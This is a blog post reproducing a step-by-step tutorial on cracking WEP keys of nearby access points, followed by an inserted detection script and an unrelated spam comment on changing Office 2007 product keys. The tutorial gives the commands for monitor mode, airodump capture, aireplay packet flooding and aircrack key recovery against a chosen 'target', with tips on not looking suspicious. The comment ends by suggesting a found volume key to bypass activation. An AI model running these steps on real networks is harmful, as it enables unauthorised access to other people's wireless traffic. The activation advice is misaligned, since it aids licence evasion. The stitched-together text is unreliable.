More Cracking WEP Guides and Information From
Intro:
Ok, this is a tutorial explaining how to crack most WEP-encrypted Access Points out there. The tools used will be as follows:
Kismet (any working version)
>= Aireplay 2.2 beta
>= Aircrack 2.1
As for wireless cards, I recommend any Prism-, Orinoco-, or Atheros-based card (I used the D-Link 650 Rev.1a).
Getting Started:
Let's see. First thing you are going to want to do is charge your lappy to the top (aireplay and aircrack drain the battery quite a bit). Next, load up your favourite live CD (I used Whoppix 2.7 final) or Linux OS, then stumble across an encrypted WLAN using Kismet. Make sure you have configured your kismet.conf file correctly so Kismet can use your card (locate your kismet.conf file and open it with your favourite text editor; I used pico):
CODE
# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.
# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
source=orinoco,eth1,kismet
#source=wlanng,wlan0,Prism
#source=kismet_drone,192.168.2.252:3501,kismet_drone
^^ That is an example of part of my kismet.conf. Initially that was wrong for me: I had to comment out the first line and uncomment the second (my wireless device name was wlan0; you can find yours by typing 'iwconfig' in a terminal).
Note: To find your card's chipset, have a good Google for the model number of your card, or try checking here: http://www.linux-wlan.org/docs/wlan_adapters.html.gz . A full list of supported chipsets can be found on the Kismet website under Documentation.
Changed kismet.conf:
CODE
# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.
# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
#source=orinoco,eth1,kismet
source=wlanng,wlan0,Prism
#source=kismet_drone,192.168.2.252:3501,kismet_drone
Save the changes you make, go back to a terminal and run 'kismet'; it should load up if you configured it properly. Once you have got kismet going, have a good stumble around your area to see if a WLAN has WEP enabled: kismet has a column near the ESSID titled 'W'. If WEP is enabled it will show Y, if not it will show N.
Going in for the kill:
So now you have got a target. Make sure you don't look suspicious and that you have at least 15 minutes' worth of battery life left. Make sure you know the channel the Access Point is on (under the CH column in kismet) and also the MAC address of the Access Point: hit 's' (to sort), scroll to the desired Access Point, then type 'i', which gives you detailed info on the selected Access Point.
First off you are going to want to set your wireless card to the right mode; which commands you have to use depends on your chipset:
CODE
If you use madwifi, you may have to place the card in pure 802.11b mode first:
iwpriv ath0 mode 2
If you use wlan-ng, run
./wlanng.sh start wlan0 [comes with Aireplay 2.2]
Otherwise run (with the channel number of the target Access Point in place of the <channel> placeholder):
iwconfig ath0 mode Monitor channel <channel>
ifconfig ath0 up
Read the Aireplay 2.2 readme for more info.
Start by opening up another terminal window, cd into your aircrack directory and launch airodump:
CODE
#./airodump
[version crap]
usage: ./airodump <interface> <output prefix> [mac filter]
e.g
./airodump wlan0 linksys
The mac filter is used when you have more than one Access Point on the same channel at once. So say you have 'jim_home' and 'linksys', both ESSIDs of Access Points on channel 11: you would grab the MAC address of the Access Point in kismet (hit 's' to sort, scroll to the desired Access Point, then type 'i' for its detailed info) and pass it as the filter.
Ok, so now you have got a stream of packets from your target. You see the IV column; those are what's known as 'weak key' packets, and we want as many of them as we can get (400k+ is a nice number). Now we are going to capture a 'weak key' packet from the network we are targeting and flood the Access Point with it, in the hope that we get lots of 'weak key' replies sent out so we can eventually crack the key. So now, in your other terminal window, 'cd' into your aireplay directory and execute aireplay ('./aireplay'[return]):
CODE
capture packets unless interface #1 is specified.
source options:
-i : capture packet on-the-fly (default)
-r file : extract packet from this pcap file
filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length, default: 40
-n len : maximum packet length, default: 512
-u type : fc, type - default: 2 = data
-v subt : fc, subtype - default: 0 = normal
-t tods : fc, To DS bit - default: any
-f fromds : fc, From DS bit - default: any
-w iswep : fc, WEP bit - default: 1
-y : don't ask questions, assume yes
replay options:
-x nbpps : number of packets per second
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-o fc0 : set frame control[0] (hex)
-p fc1 : set frame control[1] (hex)
-k : turn chopchop attack on
e.g
./aireplay -b 00:FF:00:FF:00:FF -x 512 wlan0
Here we are going to grab a few packets from the Access Point with the MAC address 00:FF:00:FF:00:FF until we catch a 'weak key' packet, which aireplay will then ask you if you want to use to flood the Access Point. When it asks if it can use one of the packets, hit 'y' then return. If you flick back to your terminal with airodump running, you should see the number of captured packets increase by a huge amount, and with that the IV count should also be increasing pretty damn fast as well; if all went well, in about 10 minutes you should have enough packets to dump into aircrack. You want at least 400k+ IV packets (the more the better). Once you have got a decent amount, hit 'control+c' in both terminal windows to terminate aireplay and airodump, then 'cd' into your aircrack directory and run aircrack ('./aircrack'[return]):
CODE
aircrack 2.1 - © 2004 Christophe Devine
usage: ./aircrack [options] <pcap file> ...
-d : debug - specify beginning of the key
-f : bruteforce fudge factor (default: 2)
-m : MAC address to filter usable packets
-n : WEP key length: 64 / 128 / 256 / 512
-p : SMP support: # of processes to start
-q : Quiet mode (less print more speed)
e.g
./aircrack -n 128 linksys.cap
What I did there was set aircrack to read my packet file called linksys.cap (which airodump creates) and tell aircrack it was 128-bit encryption. If all goes well you will get the key in nice red text.
KEY FOUND: [ Pwn3d ]
Happy WarDriving.
(Please reply with any errors in my tutorial.)
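From the defender's side, the aireplay step above has a very distinctive signature on the air: one station re-injecting the same encrypted data frame (same source, BSSID, IV and ciphertext) hundreds of times per second, which legitimate WEP traffic never does because every frame carries a fresh IV. The following is an added example, not code from the original post or from the aircrack tools, showing a wireless-IDS style check over constructed frame records; the record layout, the station MACs and the thresholds are my assumptions. Detection only buys time: the real fix is retiring WEP for WPA2/WPA3, since the weakness is in the protocol itself.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

# A captured 802.11 data frame as a wireless IDS might record it after parsing
# the header: (timestamp in seconds, source MAC, BSSID, 24-bit WEP IV as hex,
# digest of the encrypted payload). This record layout is an assumption.
Frame = Tuple[float, str, str, str, str]


def detect_replay_storms(frames: List[Frame], window_s: float = 1.0,
                         threshold: int = 20) -> List[dict]:
    """Flag any (src, bssid, iv, payload) tuple seen >= threshold times within
    a sliding window. A genuine station uses a new IV per frame, so the same
    frame repeating dozens of times per second is injection, not traffic.
    Returns one alert per offending tuple with its peak per-window count."""
    by_key: Dict[Tuple[str, str, str, str], List[float]] = defaultdict(list)
    for ts, src, bssid, iv, digest in frames:
        by_key[(src, bssid, iv, digest)].append(ts)
    alerts = []
    for (src, bssid, iv, digest), times in by_key.items():
        times.sort()
        peak, start = 0, 0
        for end in range(len(times)):          # two-pointer sliding window
            while times[end] - times[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append({"src": src, "bssid": bssid, "iv": iv,
                           "peak_per_window": peak, "total": len(times)})
    return alerts


def constructed_capture() -> List[Frame]:
    """Constructed sample (not real traffic): a few genuine client frames with
    fresh IVs, one ordinary 802.11 retransmission, then a single frame from a
    locally-administered MAC re-injected 120 times in half a second."""
    ap, client, injector = "00:FF:00:FF:00:FF", "02:00:00:00:00:02", "02:00:00:00:00:01"
    frames: List[Frame] = []
    for i in range(5):  # genuine traffic: a different IV on every frame
        frames.append((10.0 + i * 0.3, client, ap, f"{0x1A2B00 + i:06x}", f"d{i:04d}"))
    frames.append((10.05, client, ap, "1a2b00", "d0000"))  # normal retransmit, 2 copies only
    for i in range(120):  # replay storm: identical IV and ciphertext, ~250 frames/s
        frames.append((10.5 + i * 0.004, injector, ap, "3c4d5e", "deadbeef"))
    return frames


if __name__ == "__main__":
    for alert in detect_replay_storms(constructed_capture()):
        print(alert)
```

The retransmitted frame is seen twice and stays below the threshold, while the injected frame is reported with a peak of 120 copies in one window.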
POSTED BY PYPIYU AT 10:44 AM
1 COMMENTS:
moku said...
how-to-change-office-2007-product-key
You may need to alter or change the Microsoft Office 2007 (aka 2007 Microsoft Office System programs and suites) product license key or volume license key (VLK), which is also known as the serial number or CD key.
You can modify or change the product key for 2007 Microsoft Office programs or suites by first uninstalling or removing Microsoft Office and then reinstalling the business productivity suite. However, you can follow the steps below in order to reset and change the Microsoft Office 2007 product serial key without the need to uninstall or reinstall the 2007 Office system suites.
Note: The following steps involve modification of registry key values, which may corrupt your Windows if done incorrectly. Backup registry first before performing the workaround.
1. Close all Microsoft Office programs.
2. Click on Start button, then click on Run.
3. Type “regedit” (without quotes) in the Run text box, and click OK or press Enter.
4. Locate and then click the following subkey:
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\12.0\Registration
Inside, you will find another subkey that resembles the following subkey:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\12.0\Registration\{30120000-0011-0000-0000-0000000FF1CE}
5. Optional: Backup this registry branch by exporting the Registration subkey to a file, just in case the new product key does not work and you have to restore back the old product key. To export the registry, right click on the Registration subkey and click on Export, and follow the on-screen prompt to enter a file name for the registry file and choose a location to store it.
6. Under the Registration subkey, there may be several Globally Unique Identifier (GUID) subkeys that contain a combination of alphanumeric characters. Each GUID is specific to a program that is installed on your computer.
If you find additional subkeys that reference Microsoft 12.0 registration, then click and open each GUID subkey to view and identify the Office product version by the ProductName registry entry in the right pane. For example:
ProductName=Microsoft Office Professional Plus 2007
7. After you find the GUID subkey that contains the Office product or program from which you want to remove the existing product license key or registration details, delete the following registry entries by right-clicking on the registry entry in the GUID subkey, clicking Delete, and then clicking Yes:
• DigitalProductID
• ProductID
8. Exit Registry Editor.
9. Run or open an Office application program, such as Microsoft Word or Excel or Outlook. Office 2007 will prompt you to enter a new 25-character product key.
10. Type in the valid and genuine product key, and then click OK.
11. Then when prompted to choose your preferred type of Microsoft Office 2007 installation, press on “Install Now”.
12. Microsoft Office 2007 will be updated with the new product CD key or volume license key, and ready for activation (if it's a non-VLK serial) or use.
Note: If you’re having problem with your new Office 2007 product key, simply double click on the backup registry .reg file created at the optional step above to restore the registry settings of the Registration subkey so that the original value can be imported back to the registry.
You may need to reset or change the Office 2007 product key with the above steps, if you don't want to uninstall or reinstall Microsoft Office 2007 again, in many scenarios: such as when you have just bought a retail version of Office 2007, received Office 2007 as a gift, won MS Office 2007 as a prize, just got your MSN product key for Office 2007, are having problems with the activation process online or via phone, are unable to step up or convert an evaluation copy of Office 2007 to the full-use version, or are having problems with Office Genuine Advantage (OGA) validation.
On the other hand, if you manage to find a valid and genuine volume license key or VLK, you can change the product key of Microsoft Office 2007 with the VLK serial in order to bypass the Office 2007 activation process (as Office 2007 is still using WPA 1.0, where corporate users need not activate), without the need of a crack or hack for Office 2007, for full use for an unlimited period as long as you're not caught by OGA